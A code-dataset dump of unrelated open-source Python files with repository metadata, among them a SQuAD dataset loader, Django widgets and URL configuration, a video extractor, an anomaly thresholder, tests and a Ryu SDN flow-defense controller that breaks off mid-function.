1cbc305d4a15cd75f313c243d285e44a70273276 | 7,613 | py | Python | src/transformers/data/datasets/squad.py | dmlap/transformers | 79588e6fdb5af8add092fc27dd695ea1ebc68b18 | [
"Apache-2.0"
] | 77 | 2020-11-12T18:40:25.000Z | 2022-03-27T06:41:30.000Z | src/transformers/data/datasets/squad.py | dmlap/transformers | 79588e6fdb5af8add092fc27dd695ea1ebc68b18 | [
"Apache-2.0"
] | 7 | 2021-03-11T14:00:58.000Z | 2022-01-18T05:51:22.000Z | src/transformers/data/datasets/squad.py | dmlap/transformers | 79588e6fdb5af8add092fc27dd695ea1ebc68b18 | [
"Apache-2.0"
] | 23 | 2020-12-08T12:42:24.000Z | 2022-02-11T13:55:24.000Z | import logging
import os
import time
from dataclasses import dataclass, field
from enum import Enum
from typing import Dict, List, Optional, Union
import torch
from filelock import FileLock
from torch.utils.data.dataset import Dataset
from ...modeling_auto import MODEL_FOR_QUESTION_ANSWERING_MAPPING
from ...tokenization_utils import PreTrainedTokenizer
from ..processors.squad import SquadFeatures, SquadV1Processor, SquadV2Processor, squad_convert_examples_to_features
logger = logging.getLogger(__name__)
MODEL_CONFIG_CLASSES = list(MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class SquadDataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
model_type: str = field(
default=None, metadata={"help": "Model type selected in the list: " + ", ".join(MODEL_TYPES)}
)
data_dir: str = field(
default=None, metadata={"help": "The input data dir. Should contain the .json files for the SQuAD task."}
)
max_seq_length: int = field(
default=128,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
doc_stride: int = field(
default=128,
metadata={"help": "When splitting up a long document into chunks, how much stride to take between chunks."},
)
max_query_length: int = field(
default=64,
metadata={
"help": "The maximum number of tokens for the question. Questions longer than this will "
"be truncated to this length."
},
)
max_answer_length: int = field(
default=30,
metadata={
"help": "The maximum length of an answer that can be generated. This is needed because the start "
"and end predictions are not conditioned on one another."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
version_2_with_negative: bool = field(
default=False, metadata={"help": "If true, the SQuAD examples contain some that do not have an answer."}
)
null_score_diff_threshold: float = field(
default=0.0, metadata={"help": "If null_score - best_non_null is greater than the threshold predict null."}
)
n_best_size: int = field(
default=20, metadata={"help": "If null_score - best_non_null is greater than the threshold predict null."}
)
lang_id: int = field(
default=0,
metadata={
"help": "language id of input for language-specific xlm models (see tokenization_xlm.PRETRAINED_INIT_CONFIGURATION)"
},
)
threads: int = field(default=1, metadata={"help": "multiple threads for converting example to features"})
class Split(Enum):
train = "train"
dev = "dev"
class SquadDataset(Dataset):
"""
This will be superseded by a framework-agnostic approach
soon.
"""
args: SquadDataTrainingArguments
features: List[SquadFeatures]
mode: Split
is_language_sensitive: bool
def __init__(
self,
args: SquadDataTrainingArguments,
tokenizer: PreTrainedTokenizer,
limit_length: Optional[int] = None,
mode: Union[str, Split] = Split.train,
is_language_sensitive: Optional[bool] = False,
cache_dir: Optional[str] = None,
):
self.args = args
self.is_language_sensitive = is_language_sensitive
self.processor = SquadV2Processor() if args.version_2_with_negative else SquadV1Processor()
if isinstance(mode, str):
try:
mode = Split[mode]
except KeyError:
raise KeyError("mode is not a valid split name")
self.mode = mode
# Load data features from cache or dataset file
version_tag = "v2" if args.version_2_with_negative else "v1"
cached_features_file = os.path.join(
cache_dir if cache_dir is not None else args.data_dir,
"cached_{}_{}_{}_{}".format(
mode.value, tokenizer.__class__.__name__, str(args.max_seq_length), version_tag,
),
)
# Make sure only the first process in distributed training processes the dataset,
# and the others will use the cache.
lock_path = cached_features_file + ".lock"
with FileLock(lock_path):
if os.path.exists(cached_features_file) and not args.overwrite_cache:
start = time.time()
self.features = torch.load(cached_features_file)
logger.info(
f"Loading features from cached file {cached_features_file} [took %.3f s]", time.time() - start
)
else:
if mode == Split.dev:
examples = self.processor.get_dev_examples(args.data_dir)
else:
examples = self.processor.get_train_examples(args.data_dir)
self.features = squad_convert_examples_to_features(
examples=examples,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
doc_stride=args.doc_stride,
max_query_length=args.max_query_length,
is_training=mode == Split.train,
threads=args.threads,
)
start = time.time()
torch.save(self.features, cached_features_file)
# ^ This seems to take a lot of time so I want to investigate why and how we can improve.
logger.info(
"Saving features into cached file %s [took %.3f s]", cached_features_file, time.time() - start
)
def __len__(self):
return len(self.features)
def __getitem__(self, i) -> Dict[str, torch.Tensor]:
# Convert to Tensors and build dataset
feature = self.features[i]
input_ids = torch.tensor(feature.input_ids, dtype=torch.long)
attention_mask = torch.tensor(feature.attention_mask, dtype=torch.long)
token_type_ids = torch.tensor(feature.token_type_ids, dtype=torch.long)
cls_index = torch.tensor(feature.cls_index, dtype=torch.long)
p_mask = torch.tensor(feature.p_mask, dtype=torch.float)
is_impossible = torch.tensor(feature.is_impossible, dtype=torch.float)
inputs = {
"input_ids": input_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
}
if self.args.model_type in ["xlm", "roberta", "distilbert", "camembert"]:
del inputs["token_type_ids"]
if self.args.model_type in ["xlnet", "xlm"]:
inputs.update({"cls_index": cls_index, "p_mask": p_mask})
if self.args.version_2_with_negative:
inputs.update({"is_impossible": is_impossible})
if self.is_language_sensitive:
inputs.update({"langs": (torch.ones(input_ids.shape, dtype=torch.int64) * self.args.lang_id)})
if self.mode == Split.train:
start_positions = torch.tensor(feature.start_position, dtype=torch.long)
end_positions = torch.tensor(feature.end_position, dtype=torch.long)
inputs.update({"start_positions": start_positions, "end_positions": end_positions})
return inputs
| 39.445596 | 128 | 0.635623 |
d951b9b1bd59e8dc6e41eacd39b47b838ef26a6f | 502 | py | Python | file_picker/wymeditor/widgets.py | caktus/django-file-picker | 6b5503714ce6acb3f8adebd1d4867eb7d9d8690b | [
"BSD-3-Clause"
] | 12 | 2015-12-24T10:12:33.000Z | 2021-09-20T01:58:44.000Z | file_picker/wymeditor/widgets.py | caktus/django-file-picker | 6b5503714ce6acb3f8adebd1d4867eb7d9d8690b | [
"BSD-3-Clause"
] | 11 | 2016-08-31T18:28:02.000Z | 2017-12-14T15:56:20.000Z | file_picker/wymeditor/widgets.py | caktus/django-file-picker | 6b5503714ce6acb3f8adebd1d4867eb7d9d8690b | [
"BSD-3-Clause"
] | 7 | 2015-12-24T10:12:52.000Z | 2020-12-21T04:25:26.000Z | from file_picker.widgets import FilePickerWidget
class WYMeditorWidget(FilePickerWidget):
def __init__(self, pickers, *args, **kwargs):
kwargs['classes'] = ['wymeditor']
super(WYMeditorWidget, self).__init__(pickers, *args, **kwargs)
class Media:
css = {"all": ("css/filepicker.overlay.css",)}
js = ("js/ajaxupload.js",
"js/jquery.filepicker.js",
"wymeditor/jquery.wymeditor.js",
"js/jquery.wymeditor.filepicker.js")
| 33.466667 | 71 | 0.623506 |
fad1ec108a7608a0411c633805889be4b8dc4cf2 | 1,580 | py | Python | youtuatools/extractor/adobeconnect.py | Pagasis/YouTua | edb44b2065a7224f8b26aaf76166bf7287901567 | [
"MIT"
] | 47 | 2021-01-02T07:44:50.000Z | 2022-02-28T22:02:13.000Z | youtuatools/extractor/adobeconnect.py | Pagasis/YouTua | edb44b2065a7224f8b26aaf76166bf7287901567 | [
"MIT"
] | 4 | 2021-02-07T03:35:13.000Z | 2021-10-31T19:23:53.000Z | youtuatools/extractor/adobeconnect.py | Pagasis/YouTua | edb44b2065a7224f8b26aaf76166bf7287901567 | [
"MIT"
] | 8 | 2021-01-03T05:44:39.000Z | 2021-11-01T05:46:32.000Z | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import (
compat_parse_qs,
compat_urlparse,
)
class AdobeConnectIE(InfoExtractor):
_VALID_URL = r"https?://\w+\.adobeconnect\.com/(?P<id>[\w-]+)"
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
title = self._html_search_regex(r"<title>(.+?)</title>", webpage, "title")
qs = compat_parse_qs(
self._search_regex(r"swfUrl\s*=\s*'([^']+)'", webpage, "swf url").split(
"?"
)[1]
)
is_live = qs.get("isLive", ["false"])[0] == "true"
formats = []
for con_string in qs["conStrings"][0].split(","):
formats.append(
{
"format_id": con_string.split("://")[0],
"app": compat_urlparse.quote(
"?"
+ con_string.split("?")[1]
+ "flvplayerapp/"
+ qs["appInstance"][0]
),
"ext": "flv",
"play_path": "mp4:" + qs["streamName"][0],
"rtmp_conn": "S:" + qs["ticket"][0],
"rtmp_live": is_live,
"url": con_string,
}
)
return {
"id": video_id,
"title": self._live_title(title) if is_live else title,
"formats": formats,
"is_live": is_live,
}
| 32.244898 | 84 | 0.458228 |
aec0ed959af42134c26851511fb4c0e33a4ade2c | 869 | py | Python | neighbor/urls.py | Barrack-coder/Neighborhood | 5b5a304850b205962d6ddb975e6ae213a5a21ba4 | [
"MIT"
] | null | null | null | neighbor/urls.py | Barrack-coder/Neighborhood | 5b5a304850b205962d6ddb975e6ae213a5a21ba4 | [
"MIT"
] | null | null | null | neighbor/urls.py | Barrack-coder/Neighborhood | 5b5a304850b205962d6ddb975e6ae213a5a21ba4 | [
"MIT"
] | null | null | null | """neighbor URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
# from django.urls import path
from django.conf.urls import url,include
from django.contrib.auth import views
urlpatterns = [
url('admin/', admin.site.urls),
url('', include('hood.urls')),
]
| 33.423077 | 77 | 0.70771 |
058958c71b2d956d804f3b4a48f02e79f283ad47 | 6,321 | py | Python | propagation/gen_guided_model/guided_model.py | naivete5656/WSISPDR | 1dc4d1bf24a6ebf7efd3c75d3f1a9edbe849d38b | [
"MIT"
] | 37 | 2019-10-09T09:42:24.000Z | 2022-03-29T09:57:29.000Z | propagation/gen_guided_model/guided_model.py | naivete5656/WSISPDR | 1dc4d1bf24a6ebf7efd3c75d3f1a9edbe849d38b | [
"MIT"
] | 4 | 2020-02-26T06:49:02.000Z | 2021-10-17T16:29:24.000Z | propagation/gen_guided_model/guided_model.py | naivete5656/WSISPDR | 1dc4d1bf24a6ebf7efd3c75d3f1a9edbe849d38b | [
"MIT"
] | 4 | 2019-10-18T07:34:30.000Z | 2020-04-10T03:35:34.000Z | from types import MethodType
import torch.nn as nn
from .guided_parts import guide_relu
from utils import local_maxima, gaus_filter
from scipy.io import savemat
import numpy as np
import cv2
from torch.nn.modules import Module
from collections import OrderedDict
from itertools import islice
import operator
import torch
class Sequ(Module):
r"""A sequential container.
Modules will be added to it in the order they are passed in the constructor.
Alternatively, an ordered dict of modules can also be passed in.
To make it easier to understand, here is a small example::
# Example of using Sequential
model = nn.Sequential(
nn.Conv2d(1,20,5),
nn.ReLU(),
nn.Conv2d(20,64,5),
nn.ReLU()
)
# Example of using Sequential with OrderedDict
model = nn.Sequential(OrderedDict([
('conv1', nn.Conv2d(1,20,5)),
('relu1', nn.ReLU()),
('conv2', nn.Conv2d(20,64,5)),
('relu2', nn.ReLU())
]))
"""
def __init__(self, *args):
super(Sequ, self).__init__()
if len(args) == 1 and isinstance(args[0], OrderedDict):
for key, module in args[0].items():
self.add_module(key, module)
else:
for idx, module in enumerate(args):
self.add_module(str(idx), module)
def _get_item_by_idx(self, iterator, idx):
"""Get the idx-th item of the iterator"""
size = len(self)
idx = operator.index(idx)
if not -size <= idx < size:
raise IndexError("index {} is out of range".format(idx))
idx %= size
return next(islice(iterator, idx, None))
def __getitem__(self, idx):
if isinstance(idx, slice):
return self.__class__(OrderedDict(list(self._modules.items())[idx]))
else:
return self._get_item_by_idx(self._modules.values(), idx)
def __setitem__(self, idx, module):
key = self._get_item_by_idx(self._modules.keys(), idx)
return setattr(self, key, module)
def __delitem__(self, idx):
if isinstance(idx, slice):
for key in list(self._modules.keys())[idx]:
delattr(self, key)
else:
key = self._get_item_by_idx(self._modules.keys(), idx)
delattr(self, key)
def __len__(self):
return len(self._modules)
def __dir__(self):
keys = super(Sequ, self).__dir__()
keys = [key for key in keys if not key.isdigit()]
return keys
def forward(self, input, input2):
for module in self._modules.values():
input = module(input, input2)
return input
class GuidedModel(nn.Sequential):
def __init__(self, *args, **kargs):
super().__init__(*args)
self.inferencing = False
self.shape = None
def _patch(self):
for module in self.modules():
if isinstance(module, nn.ReLU):
module._original_forward = module.forward
module.forward = MethodType(guide_relu, module)
def _recover(self):
for module in self.modules():
if isinstance(module, nn.ReLU) and hasattr(module, "_original_forward"):
module.forward = module._original_forward
def forward(
self,
img,
root_path,
peak=None,
class_threshold=0,
peak_threshold=30,
retrieval_cfg=None,
):
assert img.dim() == 4, "PeakResponseMapping layer only supports batch mode."
if self.inferencing:
img.requires_grad_()
# classification network forwarding
class_response_maps = super().forward(img)
# peak backpropagation
# grad_output = mask
pre_img = class_response_maps.detach().cpu().numpy()[0, 0]
self.shape = pre_img.shape
if peak is None:
cv2.imwrite(
str(root_path.joinpath("detection.png")),
(pre_img * 255).astype(np.uint8),
)
# peak
peaks = local_maxima((pre_img * 255).astype(np.uint8), 125, 2).astype(np.int)
gauses = []
try:
for peak in peaks:
temp = np.zeros(self.shape)
temp[peak[1], peak[0]] = 255
gauses.append(gaus_filter(temp, 401, 12))
region = np.argmax(gauses, axis=0) + 1
likely_map = np.max(gauses, axis=0)
region[likely_map < 0.01] = 0
#
# r, g, b = np.loadtxt("./utils/color.csv", delimiter=",")
except ValueError:
region = np.zeros(self.shape, dtype=np.uint8)
likely_map = np.zeros(self.shape)
gbs = []
# each propagate
peaks = np.insert(peaks, 0, [0, 0], axis=0)
with open(root_path.joinpath("peaks.txt"), mode="w") as f:
f.write("ID,x,y\n")
for i in range(region.max() + 1):
if img.grad is not None:
img.grad.zero_()
# f.write(f"{i},{peaks[i, 0]},{peaks[i ,1]}\n")
f.write("{},{},{}\n".format(i, peaks[i, 0], peaks[i, 1]))
mask = np.zeros(self.shape, dtype=np.float32)
mask[region == i] = 1
mask = mask.reshape([1, 1, self.shape[0], self.shape[1]])
mask = torch.from_numpy(mask)
mask = mask.cuda()
class_response_maps.backward(mask, retain_graph=True)
result = img.grad.detach().sum(1).clone().clamp(min=0).cpu().numpy()
save_path = root_path.joinpath("each_peak")
save_path.mkdir(parents=True, exist_ok=True)
savemat(
str(save_path.joinpath("{:04d}.mat".format(i))),
{"image": result[0], "mask": mask},
)
gbs.append(result[0])
return gbs
def train(self, mode=True):
super().train(mode)
if self.inferencing:
self._recover()
self.inferencing = False
return self
def inference(self):
super().train(False)
self._patch()
self.inferencing = True
return self
| 33.444444 | 85 | 0.548647 |
9605126c5775e62303bf9a91c4ebe83781902489 | 673 | py | Python | src/braket/_schemas/_version.py | indisoluble/amazon-braket-schemas-python | d08bab112c93d21d176a4f1b2ca5d1e9d995fdf1 | [
"Apache-2.0"
] | 1 | 2021-07-10T15:29:30.000Z | 2021-07-10T15:29:30.000Z | src/braket/_schemas/_version.py | indisoluble/amazon-braket-schemas-python | d08bab112c93d21d176a4f1b2ca5d1e9d995fdf1 | [
"Apache-2.0"
] | null | null | null | src/braket/_schemas/_version.py | indisoluble/amazon-braket-schemas-python | d08bab112c93d21d176a4f1b2ca5d1e9d995fdf1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Version information.
Version number (major.minor.patch[-label])
"""
__version__ = "1.2.2.dev0"
| 35.421053 | 78 | 0.73997 |
c77898e0019bba06f61d9af816a57a28762396ee | 3,581 | py | Python | filament_watch/web_server.py | rllynch/filament_watch | 4db5d0c1ddb2498696b3f6e4bb86c16ad1182a3e | [
"MIT"
] | 7 | 2016-01-12T04:39:35.000Z | 2018-09-03T19:40:21.000Z | filament_watch/web_server.py | rllynch/filament_watch | 4db5d0c1ddb2498696b3f6e4bb86c16ad1182a3e | [
"MIT"
] | 2 | 2017-02-21T20:28:49.000Z | 2018-01-24T19:09:29.000Z | filament_watch/web_server.py | rllynch/filament_watch | 4db5d0c1ddb2498696b3f6e4bb86c16ad1182a3e | [
"MIT"
] | 6 | 2016-09-29T22:22:58.000Z | 2019-11-18T04:42:11.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
web_server.py
Web server to serve filament_watch status
"""
##############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) 2015 Richard L. Lynch <rich@richlynch.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
##############################################################################
import os
import json
import time
import cherrypy
class WebGen(object):
'''CherryPy generator for web server'''
def __init__(self):
self.state = {}
self.log_msgs = ''
@cherrypy.expose
def gen_change(self, _=None):
'''Dynamically updating data'''
cherrypy.response.headers['Content-Type'] = 'text/json'
self.state['log_msgs'] = self.log_msgs
return json.dumps(self.state)
class WebServer(object):
'''Main interface to web server'''
def __init__(self, port, show_cherrypy_logs):
self.webgen = None
self.port = port
self.log_msgs = []
self.show_cherrypy_logs = show_cherrypy_logs
def start(self):
'''Start web server'''
script_dir = os.path.dirname(os.path.abspath(__file__))
http_config = {
'server.socket_host': '0.0.0.0',
'server.socket_port': self.port
}
mount_config = {
'/': {
'tools.staticdir.on': True,
'tools.staticdir.root': script_dir,
'tools.staticdir.dir': './static_www',
'tools.staticdir.index': 'index.html'
}
}
self.webgen = WebGen()
cherrypy.config.update(http_config)
cherrypy.tree.mount(self.webgen, '/', mount_config)
# Disable redundant logging to screen
cherrypy.log.screen = False
if not self.show_cherrypy_logs:
# Disable propagation to root logger
#cherrypy.log.error_log.propagate = False
cherrypy.log.access_log.propagate = False
cherrypy.engine.start()
def update(self, state):
'''Update dynamic data'''
self.webgen.state = state
def log(self, msg):
'''Append a log message'''
timestamp = time.strftime('%H:%M:%S', time.localtime())
self.log_msgs.append('%s: %s<br/>\n' % (timestamp, msg))
if len(self.log_msgs) > 5:
self.log_msgs.pop(0)
self.webgen.log_msgs = '\n'.join(self.log_msgs)
def stop(self):
'''Stop web server'''
cherrypy.engine.stop()
self.webgen = None
| 34.432692 | 78 | 0.615191 |
0677076d937e4667c9c8f1be430bcebcbb3e0b1f | 2,746 | py | Python | streamad/process/tdigest_Thresholder.py | Fengrui-Liu/streamingTS | 1c5fcb9751c44a5fc69dcb237b48d93204b721e9 | [
"Apache-2.0"
] | null | null | null | streamad/process/tdigest_Thresholder.py | Fengrui-Liu/streamingTS | 1c5fcb9751c44a5fc69dcb237b48d93204b721e9 | [
"Apache-2.0"
] | null | null | null | streamad/process/tdigest_Thresholder.py | Fengrui-Liu/streamingTS | 1c5fcb9751c44a5fc69dcb237b48d93204b721e9 | [
"Apache-2.0"
] | null | null | null | from streamad.base import BaseDetector
import numpy as np
from typing import Type
from tdigest import TDigest
from collections import deque
class TDigestThresholder:
def __init__(
self,
detector: BaseDetector,
percentile_up: float = 95,
percentile_down: float = 5,
is_global: bool = True,
window_len: int = 100,
) -> None:
"""A thresholder which can filter out outliers using t-digest, and normalize the anomaly scores into [0,1] :cite:`DBLP:journals/simpa/Dunning21`.
Args:
detector (BaseDetector): A detector that must be a child class of BaseDetector.
percentile_up (float, optional): We regard the scores above `percentile_up` as anomalies. Defaults to 95.
percentile_down (float, optional): We regard the scores below `percentile_down` as anomalies. Defaults to 5.
is_global (bool, optional): Method to record, a global way or a rolling window way. Defaults to True.
window_len (int, optional): The length of rolling window, ignore this when `is_global=True`. Defaults to 100.
"""
self.detector = detector
self.percentile_up = percentile_up
self.percentile_down = percentile_down
self.init_data = []
self.init_flag = False
assert (
percentile_up >= 0
and percentile_up <= 100
and percentile_down >= 0
and percentile_down <= 100
), "percentile must be between 0 and 100"
self.is_global = is_global
self.score_stats = TDigest()
self.score_deque = (
deque(maxlen=detector.window_len)
if is_global
else deque(maxlen=window_len)
)
def fit_score(self, X: np.ndarray) -> float:
if self.detector.index < self.detector.window_len:
self.init_data.append(X)
self.detector.fit_score(X)
return None
if not self.init_flag:
self.init_flag = True
for data in self.init_data:
score = self.detector.score(data)
self.score_deque.append(score)
self.score_stats.batch_update(self.score_deque)
score = self.detector.fit_score(X)
if self.is_global:
self.score_stats.update(score)
else:
self.score_stats = TDigest()
self.score_stats.batch_update(self.score_deque)
percentile_up = self.score_stats.percentile(self.percentile_up)
percentile_down = self.score_stats.percentile(self.percentile_down)
if score > percentile_up or score < percentile_down:
score = 1.0
else:
score = 0.0
return score
| 35.205128 | 153 | 0.624181 |
96f5e5a8fc63fc0b94e43763454bcc0e0c19c12e | 466 | py | Python | setup.py | konikvranik/prometheus_rpi_exporter | 2af1188d216c30827ab53ccd2b0f586f9dcae080 | [
"Apache-2.0"
] | null | null | null | setup.py | konikvranik/prometheus_rpi_exporter | 2af1188d216c30827ab53ccd2b0f586f9dcae080 | [
"Apache-2.0"
] | null | null | null | setup.py | konikvranik/prometheus_rpi_exporter | 2af1188d216c30827ab53ccd2b0f586f9dcae080 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from distutils.core import setup
setup(name='Prometheus RPi exporter',
version='1.0',
description='Prometheus exporter for RPi runtime statistics such as CPU temperature.',
author='Petr Vraník',
author_email='petr@vranik.name',
url='https://github.com/konikvranik/prometheus_rpi_exporter',
scripts=['prometheus-rpi-exporter.py'],
data_files=[('/etc/systemd/system', ['rpi_exporter.service'])]
)
| 33.285714 | 92 | 0.690987 |
f8a8fa9699cbf9ac14dd0e9e709b4b1ba83ee1af | 369 | py | Python | fit_app.py | mihalw28/fitness_app | ebec29ac2277e3abc8e18834825a191b8f0c6c2e | [
"MIT"
] | null | null | null | fit_app.py | mihalw28/fitness_app | ebec29ac2277e3abc8e18834825a191b8f0c6c2e | [
"MIT"
] | 9 | 2019-05-07T08:21:58.000Z | 2022-03-08T21:09:38.000Z | fit_app.py | mihalw28/fitness_app | ebec29ac2277e3abc8e18834825a191b8f0c6c2e | [
"MIT"
] | null | null | null | from datetime import datetime
from app import create_app, db
from app.models import Train, User
app = create_app()
application = app
if __name__ == "__main__":
application.run()
@app.shell_context_processor
def make_shell_context():
return {"db": db, "User": User, "Train": Train}
@app.context_processor
def add_now():
return {"now": datetime.now()}
| 17.571429 | 51 | 0.712737 |
2ba0b37c50d152c58d68750374899f07cd5f8ca5 | 1,191 | py | Python | tests/cogs/test_verify_cog.py | lexicalunit/spellbot | 17a4999d5e1def06246727ac5481230aa4a4557d | [
"MIT"
] | 13 | 2020-07-03T01:20:54.000Z | 2021-11-22T06:06:21.000Z | tests/cogs/test_verify_cog.py | lexicalunit/spellbot | 17a4999d5e1def06246727ac5481230aa4a4557d | [
"MIT"
] | 660 | 2020-06-26T02:52:18.000Z | 2022-03-31T14:14:02.000Z | tests/cogs/test_verify_cog.py | lexicalunit/spellbot | 17a4999d5e1def06246727ac5481230aa4a4557d | [
"MIT"
] | 3 | 2020-07-12T06:18:39.000Z | 2021-06-22T06:54:47.000Z | from unittest.mock import AsyncMock, MagicMock
import discord
import pytest
from spellbot.cogs.verify_cog import VerifyCog
from spellbot.database import DatabaseSession
from spellbot.models import Verify
from tests.mixins import InteractionContextMixin
@pytest.mark.asyncio
class TestCogVerify(InteractionContextMixin):
async def test_verify_and_unverify(self):
target = MagicMock(spec=discord.Member)
target.id = 1002
target.display_name = "user"
cog = VerifyCog(self.bot)
await cog.verify.func(cog, self.ctx, target)
self.ctx.send.assert_called_once_with(f"Verified <@{target.id}>.", hidden=True)
found = DatabaseSession.query(Verify).filter(Verify.user_xid == target.id).one()
assert found.guild_xid == self.ctx.guild_id
assert found.user_xid == target.id
assert found.verified
self.ctx.send = AsyncMock() # reset mock
await cog.unverify.func(cog, self.ctx, target)
self.ctx.send.assert_called_once_with(f"Unverified <@{target.id}>.", hidden=True)
found = DatabaseSession.query(Verify).filter(Verify.user_xid == target.id).one()
assert not found.verified
| 35.029412 | 89 | 0.713686 |
b87b6c7a8966b4f67c7886026f80db2e5b4046e8 | 17,146 | py | Python | sift_PPCount.py | tuliopascoal/sift-defense | f97e1e4780ef124251e7903c97c4adb899780a4b | [
"Apache-2.0"
] | 2 | 2021-11-08T09:33:43.000Z | 2021-11-08T12:44:38.000Z | sift_PPCount.py | tuliopascoal/sift-defense | f97e1e4780ef124251e7903c97c4adb899780a4b | [
"Apache-2.0"
] | null | null | null | sift_PPCount.py | tuliopascoal/sift-defense | f97e1e4780ef124251e7903c97c4adb899780a4b | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# v 1.0
# Copyright (C) 2016 LAR
# Author: Tulio Pascoal
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import HANDSHAKE_DISPATCHER, CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.ofproto import ether
from ryu.ofproto import inet
from ryu import utils
from ryu.lib.packet import packet, ethernet, arp, ipv4, tcp, udp, icmp
import collections
from datetime import datetime, timedelta
from random import random, uniform
import threading
import thread
import time
from ryu.lib import hub
import atexit
import logging
import ryu.app.ofctl.api
_countfull = 0
_countbuffer = 0
_countflowmod = 0
_countin = 0
_countinR = 0
def incrcounterF(n):
global _countfull
_countfull = _countfull + n
def incrcounterB(n):
global _countbuffer
_countbuffer = _countbuffer + n
def incrcounterFlowMod(n):
global _countflowmod
_countflowmod = _countflowmod + n
def incrcounterIn(n):
global _countin
_countin = _countin + n
def incrcounterInR(n):
global _countinR
_countinR = _countinR + n
def savecounter():
open("counters", "w").write("Table Full Messages: %d\nBuffer Unknow Messages: %d\nFlow Mod Messages: %d\nPacket-In Messages: %d\nPacket-InR Messages: %d " % (_countfull, _countbuffer, _countflowmod, _countin, _countinR))
#open("counters", "w").write("\nBuffer Unknow Messages: %d" % _countbuffer)
#open("counters", "w").write("\nPacket In Messages: %d" % _countflowmod)
#open("counterB", "w").write("%d" % _countbuffer)
#open("counterB", "w").write("%d" % _countbuffer)
atexit.register(savecounter)
Flow = collections.namedtuple('Flow', 'src, dst, tcp_src, tcp_dst, time_in, match')
IDLE_TIME = 10
HARD_TIME = 0
#TIME = IDLE_TIME + 0.5
PMOD = 1500
buffer = 1500
pmod = 1500
round = 0.1
flow_list = list()
lock = threading.Lock()
class SimpleSwitch13(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(SimpleSwitch13, self).__init__(*args, **kwargs)
self.mac_to_port = {}
try:
thread.start_new_thread(self.reset_round, ( round,))
except:
print "Unable to start Thread for reset_round"
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self,ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
match = parser.OFPMatch()
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_Cflow(datapath, 0, match, actions)
def reset_round(self, round):
global pmod
while True:
pmod = PMOD
#print 'NEW PMOD:', pmod
time.sleep(round)
def clean_by_timeout(self, time):
global flow_list
while True:
i=0
while i < len(flow_list):
time_now = datetime.now()
diff = time_now - flow_list[i].time_in
if ( diff.seconds >= IDLE_TIME | diff.seconds >= HARD_TIME ):
print "timeout esgotado para:", flow_list[i]
del flow_list[i]
time.sleep(time)
def check_flow(self, new_flow):
global flow_list
global lock
lock.acquire()
try:
i=0
while (i < len(flow_list)):
if ( (new_flow.src == flow_list[i].src) and (new_flow.dst == flow_list[i].dst) and (new_flow.tcp_src == flow_list[i].tcp_src) and (new_flow.tcp_dst == flow_list[i].tcp_dst) ):
